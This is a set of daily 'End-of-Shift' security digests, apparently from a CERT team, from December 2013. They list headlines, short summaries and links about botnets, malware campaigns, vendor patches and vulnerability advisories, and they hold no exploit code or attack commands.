*** Botnet Enlists Firefox Users to Hack Web Sites ***
---------------------------------------------
An unusual botnet that has ensnared more than 12,500 systems disguises itself as a legitimate add-on for Mozilla Firefox and forces infected PCs to scour Web sites for vulnerabilities that can be used to install malware, an investigation by KrebsOnSecurity has discovered.
---------------------------------------------
http://krebsonsecurity.com/2013/12/botnet-enlists-firefox-users-to-hack-web…
*** Cybercriminals Using Targeted Attack Methodologies (Part 1) ***
---------------------------------------------
One of our 2014 security predictions is that cyber criminals will more frequently leverage targeted attack methodologies. Some of these tactics include using spear phishing attacks, as well as well-known vulnerabilities that have been used successfully in targeted attacks. Let's see why cybercriminals are taking a closer look at these techniques, and how this can...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/CY7n7WI2qUY/
*** Attacking Online Poker Players ***
---------------------------------------------
This story is about how at least two professional online poker players had their hotel rooms broken into and their computers infected with malware. I agree with the conclusion: So, what's the moral of the story? If you have a laptop that is used to move large amounts of money, take good care of it. Lock the keyboard when you...
---------------------------------------------
https://www.schneier.com/blog/archives/2013/12/attacking_onlin.html
*** P2P botnet ZeroAccess hard to kill ***
---------------------------------------------
The joint operation by Microsoft, the FBI and Europol that aimed to shut down the click-fraud botnet ZeroAccess apparently largely missed its mark. The botnet still appears to be alive and kicking.
---------------------------------------------
http://www.heise.de/security/meldung/P2P-Botnetz-ZeroAccess-kaum-tot-zu-kri…
*** Bogus Antivirus Program Uses a Dozen Stolen Signing Certificates ***
---------------------------------------------
A fake antivirus program in circulation uses at least a dozen stolen digital code-signing certificates, indicating cybercriminals are increasingly breaching the networks of software developers, Microsoft wrote on Sunday. The application, branded as "Antivirus Security Pro," was first detected in 2009 and has gone by a handful of other names over the years, according to a Microsoft advisory, which calls it by a single name, "Win32/Winwebsec."
---------------------------------------------
http://www.cio.com/article/744689/Bogus_Antivirus_Program_Uses_a_Dozen_Stol…
*** Old Apple Safaris leave IDs and passwords for scavengers to peck ***
---------------------------------------------
... the problem derives from Safari's retention of browser history as applied in the "Reopen All Windows from Last Session" feature that enables users to quickly revisit the sites they opened during a previous Safari session. Sadly, however, Kaspersky has found that the document Safari creates to allow such restoration is in plaintext and contains user IDs and passwords. The file is hidden, but isn't hard to find once you know what you are looking for.
---------------------------------------------
http://www.theregister.co.uk/2013/12/16/kaspersky_says_old_apple_safaris_ex…
*** Newly launched 'HTTP-based botnet setup as a service' empowers novice cybercriminals with bulletproof hosting capabilities - part three ***
---------------------------------------------
In a series of blog posts throughout 2013, we emphasized the lowering of the entry barriers into the world of cybercrime, largely made possible by the rise of managed services, the re-emergence of the DIY (do-it-yourself) trend, and the development of niche market segments, like the practice of setting up and offering bulletproof hosting for a novice cybercriminal's botnet generating platform. The proliferation of these easy to use, once only found in the arsenal of tools of the
---------------------------------------------
http://www.webroot.com/blog/blog/2013/12/16/newly-launched-http-based-botne…
*** Siemens COMOS Privilege Escalation ***
---------------------------------------------
Siemens notified NCCIC/ICS-CERT of a privilege escalation vulnerability in the Siemens COMOS database application. An update has been produced by Siemens and is available to resolve the vulnerability. The client application used for accessing the database system might allow authenticated Windows users to elevate their rights with regard to database access via the COMOS graphical user interface.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-347-01
*** Cisco WebEx Training Center open redirect ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/89686
*** WordPress Broken Link Checker Plugin Two Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56053
*** IBM Rational Focal Point Webservice Axis Gateway information disclosure 1 ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/87293
*** IBM Rational Focal Point Webservice Axis Gateway information disclosure 2 ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/87294
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 12-12-2013 18:00 − Friday 13-12-2013 18:00
Handler: Matthias Fraidl
Co-Handler: Robert Waldner
*** Android 4.4.2 Update Fixes Flash SMS DoS Vulnerability ***
---------------------------------------------
Google has patched a previously disclosed issue in its Nexus line of phones that could have opened a user up to a nasty series of SMS-based denial of service attacks.
---------------------------------------------
http://threatpost.com/android-4-4-2-update-fixes-flash-sms-dos-vulnerabilit…
*** Tumblr under fire from DIY CAPTCHA-solving, proxies-supporting automatic account registration tools ***
---------------------------------------------
Next to the traffic acquisition tactics ubiquitous in the cybercrime ecosystem, such as blackhat SEO (search engine optimization), malvertising, embedded/injected redirectors/doorways on legitimate Web sites, establishing purely malicious infrastructure, and social engineering driven spam campaigns, cybercriminals are also masters of utilizing social media for the purpose of attracting traffic to their fraudulent/malicious campaigns.
---------------------------------------------
http://www.webroot.com/blog/blog/2013/12/12/tumblr-fire-diy-captcha-solving…
*** Bitcoin-Related Malware Continues to Flourish ***
---------------------------------------------
One good way to measure the popularity of an emerging technology or trend is to see how much attention attackers and malware authors are paying it. Using that as a yardstick, Bitcoin is moving its way up the charts in a hurry. The latest indication is some malware that researchers at Arbor Networks identified that ...
---------------------------------------------
http://threatpost.com/bitcoin-related-malware-continues-to-flourish/103177
*** WordPress OptimizePress Theme - File Upload Vulnerability ***
---------------------------------------------
We're a few days short on this, but it's still worth releasing as the number of attacks against this vulnerability is increasing ten-fold.
The folks at OSIRT were the first to report this in late November, 2013. In our cases we're seeing mostly defacement attacks, and although not devastating, they can be a big nuisance for an unsuspecting website owner.
---------------------------------------------
http://blog.sucuri.net/2013/12/wordpress-optimizepress-theme-file-upload-vu…
*** Weekly Metasploit Update: New Meterpreter Extended API, Learning About HttpServer, HttpClient, and SAP ***
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2013/12/12/weekly-me…
*** VU#586958: SketchUp Viewer buffer overflow vulnerability ***
---------------------------------------------
Vulnerability Note VU#586958 SketchUp Viewer buffer overflow vulnerability
Original Release date: 12 Dec 2013 | Last revised: 12 Dec 2013
Overview: SketchUp Viewer version 13.0.4124 is vulnerable to a buffer overflow when opening a malformed .SKP file.
Description: CWE-121: Stack-based Buffer Overflow - CVE-2013-6038. SketchUp Viewer version 13.0.4124 is vulnerable to a stack buffer overflow when parsing a specially crafted .SKP file. When executed, it may allow a remote unauthenticated attacker
---------------------------------------------
http://www.kb.cert.org/vuls/id/586958
*** Cooper Power Systems Improper Input Validation Vulnerability ***
---------------------------------------------
Adam Crain of Automatak and independent researcher Chris Sistrunk have identified an improper input validation vulnerability in the Cooper Power Systems SMP Gateway DNP3 protocol components. Cooper Power Systems has produced a new firmware version that mitigates this vulnerability. The researchers have tested the new firmware version to validate that it resolves the vulnerability. This vulnerability could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-346-01
*** Dear Gmailer: I know what you read last summer (and last night and today) ***
---------------------------------------------
How Gmail's image tweak is a boon to marketers, stalkers, and debt collectors.
---------------------------------------------
http://arstechnica.com/security/2013/12/dear-gmailer-i-know-what-you-read-l…
*** Report: Bot traffic is up to 61.5% of all website traffic ***
---------------------------------------------
Last March we published a study that showed the majority of website traffic (51%) was generated by non-human entities, 60% of which were clearly malicious. As we soon learned, these facts came as a surprise to many Internet users, for whom they served as a rare glimpse of 'in between the lines' of Google Analytics.
---------------------------------------------
http://www.incapsula.com/the-incapsula-blog/item/820-bot-traffic-report-2013
*** Five Deadly Security Venoms - You're Still Doing it Wrong ***
---------------------------------------------
With all the hype and hoopla surrounding the US government's tapping of everything under the sun, I have seen an influx of articles related to security. "This is how you encrypt!", "this is how you secure!", "this is how... You're doing it wrong."
---------------------------------------------
http://infiltrated.net/index.php?option=com_content&view=article&id=61
*** Tech Pick of the Week: Log anomaly detection tools ***
---------------------------------------------
An important part of creating successful digital services is the ability to monitor a system's health and to respond to exceptional situations in a timely fashion. Log files contain the information a maintainer needs to figure out the causes of application failures or unexpected behavior.
---------------------------------------------
http://blog.futurice.com/tech-pick-of-the-week-log-anomaly-detection-tools
*** New Gmail image server proxies raise security risks ***
---------------------------------------------
A new Gmail policy that allows e-mailed image attachments to load automatically comes at a price, say two security researchers. Google announced on Thursday that Gmail would once again load attached images by default. The feature had been disabled years ago, as a way of clamping down on malware and phishing attacks.
---------------------------------------------
http://news.cnet.com/8301-1009_3-57615502-83/new-gmail-image-server-proxies…
*** Top 8 breaches in 2013 ***
---------------------------------------------
From the headline-grabbing Adobe breach to LivingSocial's password debacle, here are the top 8 breaches that have occurred this year and created even more security awareness.
---------------------------------------------
http://www.scmagazine.com/top-8-breaches-in-2013/slideshow/1673/
*** Hacked Via RDP: Really Dumb Passwords ***
---------------------------------------------
Businesses spend billions of dollars annually on software and hardware to block external cyberattacks, but a shocking number of these same organizations shoot themselves in the foot by poking gaping holes in their digital defenses and then advertising those vulnerabilities to attackers. Today's post examines an underground service which rents access to hacked PCs at organizations that make this all-too-common mistake.
---------------------------------------------
http://krebsonsecurity.com/2013/12/hacked-via-rdp-really-dumb-passwords/
*** Safari Stores Previous Secure Browsing Session Data Unencrypted ***
---------------------------------------------
The Safari browser stores data from previous sessions in an unencrypted format on a hidden folder that leaves users vulnerable to information loss.
---------------------------------------------
http://threatpost.com/safari-stores-previous-secure-browsing-session-data-u…
*** Debian update for php5 ***
---------------------------------------------
https://secunia.com/advisories/55918
*** Cisco Unified Communications Manager - TFTP Service ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120093
*** libvirt Bugs Let Remote and Local Users Deny Service and Let Local Users Gain Elevated Privileges ***
---------------------------------------------
http://www.securitytracker.com/id/1029444
*** Ruby Gem Webbynode 1.0.5.3 Command injection ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120095
*** Vuln: Monitorix HTTP Server handle_request() Remote Command Execution Vulnerability ***
---------------------------------------------
http://www.securityfocus.com/bid/64178
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 11-12-2013 18:00 − Thursday 12-12-2013 18:00
Handler: Matthias Fraidl
Co-Handler: n/a
*** How cybercriminals efficiently violate YouTube, Facebook, Twitter, Instagram, SoundCloud and Google+'s ToS ***
---------------------------------------------
With social media now an inseparable part of the marketing expenditures of every modern organization, cybercriminals quickly adapted to the ongoing buzz and, over the last couple of years, have been persistently supplying the market segment with social media metrics performance boosts, in the form of bogus likes, dislikes, comments, favorites, subscribers, and video/music plays.
---------------------------------------------
http://www.webroot.com/blog/2013/12/11/cybercriminals-efficiently-violate-m…
*** Inside the TextSecure, CyanogenMod Integration ***
---------------------------------------------
Moxie Marlinspike explains how Open WhisperSystems plans to bring end-to-end encrypted secure communications to major platforms such as Android, iOS and popular Web browsers.
---------------------------------------------
http://threatpost.com/inside-the-textsecure-cyanogenmod-integration/103164
*** The Kernel is calling a zero(day) pointer - CVE-2013-5065 - Ring Ring ***
---------------------------------------------
SpiderLabs investigates a number of suspicious binary files on a daily basis. A week ago we came across a PDF file which had two different vulnerabilities: a remote-code-execution vulnerability in Adobe Reader and a new escalation-of-privileges vulnerability in the Windows kernel.
---------------------------------------------
http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-…
*** Software defense: mitigating common exploitation techniques ***
---------------------------------------------
In our previous posts in this series, we described various mitigation improvements that attempt to prevent the exploitation of specific classes of memory safety vulnerabilities such as those that involve stack corruption, heap corruption, and unsafe list management and reference count mismanagement. These mitigations are typically associated with a specific developer mistake such as writing beyond the bounds of a stack or heap buffer, failing to correctly track reference counts, and so on.
---------------------------------------------
http://blogs.technet.com/b/srd/archive/2013/12/11/software-defense-mitigati…
*** Operation Ke3chang: Targeted Attacks Against Ministries of Foreign Affairs ***
---------------------------------------------
This week, FireEye released a report detailing how Chinese-speaking advanced persistent threat (APT) actors systematically attacked European ministries of foreign affairs (MFAs). Within 24 hours, the Chinese government officially responded.
---------------------------------------------
http://www.fireeye.com/blog/technical/malware-research/2013/12/operation-ke…
*** Blog: Forecasts for 2014 - expert opinion ***
---------------------------------------------
In 2014 we expect significant growth in the number of threats related to economic and domestic cyber-espionage, with cyber-mercenaries/cyber-detectives playing an active role in such attacks.
---------------------------------------------
http://www.securelist.com/en/blog/8167/Forecasts_for_2014_expert_opinion
*** Thousands of online shops based on xt:Commerce acutely threatened ***
---------------------------------------------
The shop software xt:Commerce 3 and its derivatives such as Gambio and Modified contain two bugs which, in combination, allow shops to be taken over completely. According to initial rough estimates, the software is used by roughly 50,000 shops. Fortunately, workarounds and patches are available to protect against this.
---------------------------------------------
http://www.heise.de/security/meldung/Tausende-Online-Shops-auf-Basis-von-xt…
*** D-Link DSL-6740U Cross-Site Request Forgery Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/55999
*** InstantCMS "orderby" SQL Injection Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56041
*** PHP OpenSSL Extension X.509 Certificate Parsing Memory Corruption Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56055
*** Adobe ColdFusion 9/10 Administrative Login Bypass ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120084
*** Vtiger 5.4.0 Cross Site Scripting ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120088
*** Plone Multiple Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/56015
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 10-12-2013 18:00 − Wednesday 11-12-2013 18:00
Handler: Matthias Fraidl
Co-Handler: Robert Waldner
*** Summary for December 2013 - Version: 1.0 ***
---------------------------------------------
This bulletin summary lists security bulletins released for December 2013.
With the release of the security bulletins for December 2013, this bulletin summary replaces the bulletin advance notification originally issued December 5, 2013.
For information about how to receive automatic notifications whenever Microsoft security bulletins are issued, visit Microsoft Technical Security Notifications.
---------------------------------------------
http://technet.microsoft.com/en-us/security/bulletin/ms13-dec
*** Rotbrow: the Sefnit distributor ***
---------------------------------------------
This month's addition to the Microsoft Malicious Software Removal Tool is a family that is both old and new. Win32/Rotbrow existed as far back as 2011, but the first time we saw it used for malicious purposes was only in the past few months. In September, Geoff blogged about the dramatic resurgence of Win32/Sefnit (aka Mevade). At the time, we knew of several ways in which Sefnit was distributed, but we continued investigating how it was able to get on so many machines. When we concentrated on
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2013/12/10/rotbrow-the-sefnit-distr…
*** Firefox 26 Makes Java Plugins Click-to-Play, Fixes 14 Security Flaws ***
---------------------------------------------
Mozilla has released a major new version of Firefox, which includes fixes for more than a dozen security vulnerabilities as well as an important change that makes all Java plugins click-to-play by default. This feature prevents those plugins from running automatically on Web pages, which helps protect users against some Web-based attacks. The modification to […]
---------------------------------------------
http://threatpost.com/firefox-26-makes-java-plugins-click-to-play-fixes-14-…
*** DSA-2815 munin ***
---------------------------------------------
Christoph Biedl discovered two denial of service vulnerabilities in munin, a network-wide graphing framework.
---------------------------------------------
http://www.debian.org/security/2013/dsa-2815
*** Zero-Day Fixes From Adobe, Microsoft ***
---------------------------------------------
Adobe and Microsoft today each separately released security updates to remedy zero-day bugs and other critical vulnerabilities in their software. Adobe issued fixes for its Flash and Shockwave players, while Microsoft pushed out 11 updates addressing at least two dozen flaws in Windows and other software.
---------------------------------------------
http://feedproxy.google.com/~r/KrebsOnSecurity/~3/gWnv_MqLeM4/
*** WordPress 3.7.1 Maintenance Release ***
---------------------------------------------
WordPress 3.7.1 is now available! This maintenance release addresses 11 bugs in WordPress 3.7.
---------------------------------------------
http://wordpress.org/news/2013/10/wordpress-3-7-1/
*** Adobe Shockwave Player Two Memory Corruption Vulnerabilities ***
---------------------------------------------
Two vulnerabilities have been reported in Adobe Shockwave Player, which can be exploited by malicious people to compromise a user's system.
1) An unspecified error can be exploited to cause memory corruption.
2) Another unspecified error can be exploited to cause memory corruption.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code.
---------------------------------------------
https://secunia.com/advisories/55952
*** Thought your Android phone was locked? THINK AGAIN ***
---------------------------------------------
Another day, another vulnerability. Android has taken another step to cement its place behind Java in the world of repeatedly vulnerable software, with German group Curesec discovering that an attacker can get past users' PINs to unlock the phone.…
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2013/12/10/android_has…
*** ENISA lists top cyber-threats in this year’s Threat Landscape Report. ***
---------------------------------------------
The EU’s cyber security Agency ENISA has issued its annual Threat Landscape 2013 report, where over 200 publicly available reports and articles have been analysed. Questions addressed are: What are the top cyber-threats of 2013? Who are the adversaries? What are the important cyber-threat trends in the digital ecosystem?
---------------------------------------------
http://www.enisa.europa.eu/media/press-releases/enisa-lists-top-cyber-threa…
*** HP Officejet Pro 8500 Printer Input Validation Flaw Permits Cross-Site Scripting Attacks ***
---------------------------------------------
A vulnerability was reported in the HP Officejet Pro 8500 Printer. A remote user can conduct cross-site scripting attacks.
The printer interface does not properly filter HTML code from user-supplied input before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the HP Printer interface and will run in the security context of that site...
---------------------------------------------
http://www.securitytracker.com/id/1029466
*** A New Vulnerability in the Android Framework: Fragment Injection ***
---------------------------------------------
We have recently disclosed a new vulnerability to the Android Security Team. The vulnerability affected many apps, including Settings (the one that is found on every Android device), Gmail, Google Now, DropBox and Evernote. To be more accurate, any App which extended the PreferenceActivity class using an exported activity was automatically vulnerable.
---------------------------------------------
http://securityintelligence.com/new-vulnerability-android-framework-fragmen…
*** TYPO3-FLOW-SA-2013-001: Cross-Site Scripting in TYPO3 Flow ***
---------------------------------------------
Problem Description: The errorAction method in the ActionController base class of Flow returns error messages without properly encoding them. Because these error messages can contain user input, this could lead to a Cross-Site Scripting vulnerability in Flow driven applications.
---------------------------------------------
http://typo3.org/teams/security/security-bulletins/typo3-flow/typo3-flow-sa…
*** Creepware - Who’s Watching You? ***
---------------------------------------------
Some people stick a piece of tape over the webcam on their laptop, maybe you even do it yourself. Are they over cautious, paranoid, a little strange? Are you? Or is there reason behind this madness? Many of us have heard the stories about people being spied on using their own computer or people being blackmailed using embarrassing or incriminating video footage unknowingly recorded from compromised webcams...
---------------------------------------------
http://www.symantec.com/connect/blogs/creepware-who-s-watching-you
*** Blog: The inevitable move - 64-bit ZeuS has come enhanced with Tor ***
---------------------------------------------
The more people switch to 64-bit platforms, the more 64-bit malware appears. We have been following this process for several years now. The more people work on 64-bit platforms, the more 64-bit applications are developed as well. Sometimes these include some very specific applications, for example, banking applications.... If someone wants to hack into an application like this and steal information, the best tool for that would also be a 64-bit agent. And what's the most notorious
---------------------------------------------
http://www.securelist.com/en/blog/208214171/The_inevitable_move_64_bit_ZeuS…
*** TYPO3 Multiple Vulnerabilities ***
---------------------------------------------
A weakness and multiple vulnerabilities have been reported in TYPO3, which can be exploited by malicious users to disclose sensitive information, conduct script insertion attacks, manipulate certain data, and bypass certain security restrictions and by malicious people to conduct cross-site scripting and spoofing attacks.
---------------------------------------------
https://secunia.com/advisories/55958
*** SAProuter Authentication Bypass Security Bypass Vulnerability ***
---------------------------------------------
ERPScan has reported a vulnerability in SAProuter, which can be exploited by malicious people to bypass certain security restrictions.
The vulnerability is caused due to the application not properly restricting access to certain functionalities, which can be exploited to e.g. manipulate the configuration.
---------------------------------------------
https://secunia.com/advisories/56060
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 09-12-2013 18:00 − Tuesday 10-12-2013 18:00
Handler: Matthias Fraidl
Co-Handler: n/a
*** French Government Spoofs Google Certificate ***
---------------------------------------------
Google revoked digital certificates for some of its domains that had been fraudulently signed by an intermediate certificate authority with links to ANSSI, France's cyber-defense agency.
---------------------------------------------
http://threatpost.com/french-government-spoofs-google-certificate/103128
*** How We Decoded Some Nasty Multi-Level Encoded Malware ***
---------------------------------------------
From time to time, we come up with interesting bits of malware that are just calling us to decode and learn more about them. This is one of those cases. Recently, I crossed paths with this little gem: That snippet is encoded malicious content.
---------------------------------------------
http://blog.sucuri.net/2013/12/how-we-decoded-some-nasty-multi-level-encode…
*** Microsoft Security Advisory (2916652): Improperly Issued Digital Certificates Could Allow Spoofing - Version: 1.0 ***
---------------------------------------------
Microsoft is aware of an improperly issued subordinate CA certificate that could be used in attempts to spoof content, perform phishing attacks, or perform man-in-the-middle attacks. The subordinate CA certificate was improperly issued by the Directorate General of the Treasury (DG Trésor), subordinate to the Government of France CA (ANSSI), which is a CA present in the Trusted Root Certification Authorities Store. This issue affects all supported releases of Microsoft Windows. Microsoft is not currently aware of attacks related to this issue.
---------------------------------------------
http://technet.microsoft.com/en-us/security/advisory/2916652
*** Untouched P2P Communication Infrastructure Keeps ZeroAccess Up and Running ***
---------------------------------------------
Microsoft's takedown of the ZeroAccess botnet wasn't a complete success. Experts point out that Microsoft targeted only the money-making aspects of the botnet, and that its communication protocol was untouched.
---------------------------------------------
http://threatpost.com/untouched-p2p-communication-infrastructure-keeps-zero…
*** The Curious Case of the Malicious IIS Module ***
---------------------------------------------
Recently, we've seen a few instances of a malicious DLL that is installed as an IIS module making its rounds in forensic cases. This module is of particular concern as it is currently undetectable by almost all anti-virus products. The malware is used by attackers to target sensitive information in POST requests, and has mechanisms in place for data exfiltration.
---------------------------------------------
http://blog.spiderlabs.com/2013/12/the-curious-case-of-the-malicious-iis-mo…
*** CyanogenMod to have built in text message encryption system ***
---------------------------------------------
People are now more concerned about their privacy after discovering the efforts made by governments to spy on their communications. The most practical solution to keep messages, emails and calls secure is to use a cryptographic encryption mechanism. However, just like the name of the method, the installation process is complex for most users. To solve this, CyanogenMod will come equipped with a built-in encryption system for text messages.
---------------------------------------------
http://www.muktware.com/2013/12/cyanogenmod-built-text-message-encryption-s…
*** Phantom menace? A guide to APTs - and why most of us have little to fear from these 'cyberweapons' ***
---------------------------------------------
APTs - or Advanced Persistent Threats - are the most menacing cyber attack there is, some say. Orchestrated by teams of hundreds of experts, they penetrate systems so deeply that they can remain for years, stealing secrets by the terabyte.
---------------------------------------------
http://www.welivesecurity.com/2013/12/09/phantom-menace-a-guide-to-apts-and…
*** New security features added to Microsoft accounts ***
---------------------------------------------
We're excited to announce that over the next couple of days we're rolling out a few new capabilities - based on your ongoing feedback - that give you more visibility and control of your Microsoft account.
---------------------------------------------
http://blogs.technet.com/b/microsoft_blog/archive/2013/12/09/new-security-f…
*** Analysis: Kaspersky Security Bulletin 2013. Overall statistics for 2013 ***
---------------------------------------------
This section of the report forms part of the Kaspersky Security Bulletin 2013 and is based on data obtained and processed using Kaspersky Security Network. KSN integrates cloud-based technologies into personal and corporate products, and is one of Kaspersky Lab's most important innovations.
---------------------------------------------
http://www.securelist.com/en/analysis/204792318/Kaspersky_Security_Bulletin…
*** November 2013 virus activity review from Doctor Web ***
---------------------------------------------
December 2, 2013: Virus analysts at the Russian anti-virus company Doctor Web discovered and examined quite a variety of information security threats in November 2013. In particular, a Trojan targeting SAP business software and malware that generates fake search results on Windows machines were added to the Dr.Web virus database at the beginning of the month.
---------------------------------------------
http://news.drweb.com/show/?i=4122&lng=en&c=9
*** DSA-2812 samba ***
---------------------------------------------
http://www.debian.org/security/2013/dsa-2812
*** RSA Security Analytics Core Can Be Accessed By Remote Users ***
---------------------------------------------
http://www.securitytracker.com/id/1029446
*** pam_userdb password hashes aren't compared case-sensitive ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120069
*** TYPO3-CORE-SA-2013-004: Multiple Vulnerabilities in TYPO3 CMS ***
---------------------------------------------
http://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa…
*** McAfee Email Gateway 7.6 multiple vulnerabilities ***
---------------------------------------------
http://seclists.org/fulldisclosure/2013/Dec/18
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 06-12-2013 18:00 − Monday 09-12-2013 18:00
Handler: Matthias Fraidl
Co-Handler: n/a
*** RuggedCom ROS Multiple Vulnerabilities ***
---------------------------------------------
Siemens has reported to NCCIC/ICS-CERT multiple vulnerabilities in the RuggedCom Rugged OS (ROS). Siemens has produced a firmware update that mitigates these vulnerabilities. Exploitation of these vulnerabilities could allow an attacker to hijack an active Web session and access administrative functions on the devices without proper authorization. These vulnerabilities could be exploited remotely.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-340-01
*** The Biggest Security Stories of 2013 ***
---------------------------------------------
As 2013 comes to a close, security experts are looking back at the major stories and developments of the year, including the Edward Snowden NSA leaks and major malware attacks. In this video, Vitaly Kamluk of Kaspersky Lab examines the biggest security news of 2013 and talks about the lasting effects they may have.
---------------------------------------------
http://threatpost.com/the-biggest-security-stories-of-2013/103125
*** Microsoft teams up with Feds, Europol in ZeroAccess botnet zombie hunt ***
---------------------------------------------
Just don't bork our crim-busting honeypots again. Microsoft has teamed up with the FBI to launch a renewed attempt to disrupt the operations of the infamous ZeroAccess botnet.
---------------------------------------------
http://www.theregister.co.uk/2013/12/06/zeroaccess_zombienet_takedown/
*** FAQ: Pony Malware Payload Discovery ***
---------------------------------------------
Our team's discovery of the spoils of yet another instance of Pony 1.9 has kept us busy the past couple of days. We've enjoyed explaining our discovery to journalists and trying our best to answer the questions that arise over social networks and email with each publication of a story. A lot of those questions tend to be similar.
---------------------------------------------
http://blog.spiderlabs.com/2013/12/faq-pony-malware-payload-discovery.html
*** 2014 Predictions: Blurring Boundaries ***
---------------------------------------------
The past year has been an interesting one in the world of cyber security. Mobile malware has become a large-scale threat, government surveillance has users asking "does privacy still exist?", cybercrime continues to steal money from individuals and businesses, and new targets for hackers like AIS and SCADA have been identified. 2013 was many things, but boring was not one of them.
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/2014-predictions…
*** The state of targeted attacks ***
---------------------------------------------
Trusteer announced the results of a recent study on the State of Targeted Attacks, which took into consideration the feedback from over 750 IT and IT security practitioners who have involvement in defensive efforts against APTs launched at their organisations.
---------------------------------------------
http://www.net-security.org/secworld.php?id=16059
*** Android apps: security vulnerability due to faulty SSL verification ***
---------------------------------------------
The Fraunhofer Institute for Secure Information Technology has identified several Android apps in which faulty verification of the SSL certificate makes it possible to access login credentials. Only about half of the vendors contacted have closed the vulnerability so far.
---------------------------------------------
http://www.golem.de/news/android-apps-sicherheitsluecke-durch-fehlerhafte-s…
*** The world's most dangerous mobile phone spying app just moved into the tablet and iPad market ***
---------------------------------------------
The evolution of GPS and the smart-phone market has spawned a macabre industry of surveillance apps designed to be covertly installed onto the cellphones of vulnerable employees, business associates, partners and children.
---------------------------------------------
http://www.privacysurgeon.org/blog/incision/the-worlds-most-dangerous-mobil…
*** Bypassing Windows AppLocker using a Time of Check Time of Use vulnerability ***
---------------------------------------------
Windows AppLocker is Microsoft's replacement for Software Restriction Policies in Windows 7, Windows 8, Server 2008 and Server 2012. Windows AppLocker has been promoted by several government agencies such as the National Security Agency and the New Zealand National Cyber Security Center as an effective mechanism to combat the execution of unauthorized code on modern Microsoft Windows based systems.
---------------------------------------------
http://www.nccgroup.com/media/495634/2013-12-04_-_ncc_-_technical_paper_-_b…
*** Automater - IP URL and MD5 OSINT Analysis ***
---------------------------------------------
Automater is a URL/domain, IP address, and MD5 hash OSINT tool aimed at making the analysis process easier for intrusion analysts. Given a target (URL, IP, or hash) or a file full of targets, Automater will return relevant results from sources like the following: IPvoid.com, Robtex.com, Fortiguard.com, unshorten.me, Urlvoid.com, Labs.alienvault.com, ThreatExpert, VxVault, and VirusTotal.
---------------------------------------------
http://www.tekdefense.com/automater/
*** Three GIMP vulnerabilities in one blow ***
---------------------------------------------
Red Hat's security team has found and fixed three memory-management problems in the image-editing software GIMP that could be exploited to foist malicious code on the user.
---------------------------------------------
http://www.heise.de/security/meldung/Drei-GIMP-Luecken-auf-einen-Streich-20…
*** Malicious multi-hop iframe campaign affects thousands of Web sites, leads to a cocktail of client-side exploits - part two ***
---------------------------------------------
Ever since we exposed and profiled the evasive, multi-hop, mass iframe campaign that affected thousands of Web sites in November, we have continued to monitor it, believing that the cybercriminal(s) behind it would continue operating it, basically switching to new infrastructure once the infrastructure exposed in the post got blacklisted, thereby undermining the impact of the campaign internationally.
---------------------------------------------
http://www.webroot.com/blog/2013/12/09/malicious-multi-hop-iframe-campaign-…
*** Putting malware in the picture ***
---------------------------------------------
Spammers actively spread malware using fake notifications on behalf of various financial and banking institutions, booking and delivery services and other companies. The arsenal of tricks used by cybercriminals is constantly being updated. In particular, in recent years we have registered a number of English- and German-language mass mailings in which the attackers try to hide malware under photos and pictures.
---------------------------------------------
https://www.securelist.com/en/blog/8159/Putting_malware_in_the_picture
*** [webapps] - Zimbra 0day exploit / Privilegie escalation via LFI ***
---------------------------------------------
http://www.exploit-db.com/exploits/30085
*** D-Link DSR Router Remote Root Shell Exploit ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120055
*** WordPress DZS Video Gallery 3.1.3 Remote File Disclosure ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2013120050
*** cURL Certificate Validation Flaw Lets Remote Users Spoof SSL Servers ***
---------------------------------------------
http://www.securitytracker.com/id/1029434
*** Security Bulletin: Multiple Security vulnerability fix for IBM Tivoli Storage Manager Administration Center (CVE-2012-5081, CVE-2013-0169, CVE-2013-0443). ***
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul…
*** Steinberg MyMp3PRO SEH buffer overflow ***
---------------------------------------------
http://xforce.iss.net/xforce/xfdb/89468
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 05-12-2013 18:00 − Friday 06-12-2013 18:00
Handler: Stephan Richter
Co-Handler: Robert Waldner
*** Advance Notification Service for December 2013 Security Bulletin Release ***
---------------------------------------------
Today we're providing advance notification for the release of 11 bulletins, five Critical and six Important, for December 2013. The Critical updates address vulnerabilities in Internet Explorer, Windows, Microsoft Exchange and GDI+. The Critical update for GDI+ fully addresses the publicly disclosed issue described in Security Advisory 2896666. This release won't include an update for the issue described in Security Advisory 2914486. We're still working to develop a security...
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2013/12/05/advance-notification-ser…
*** Google Docs Scam Stealing Passwords ***
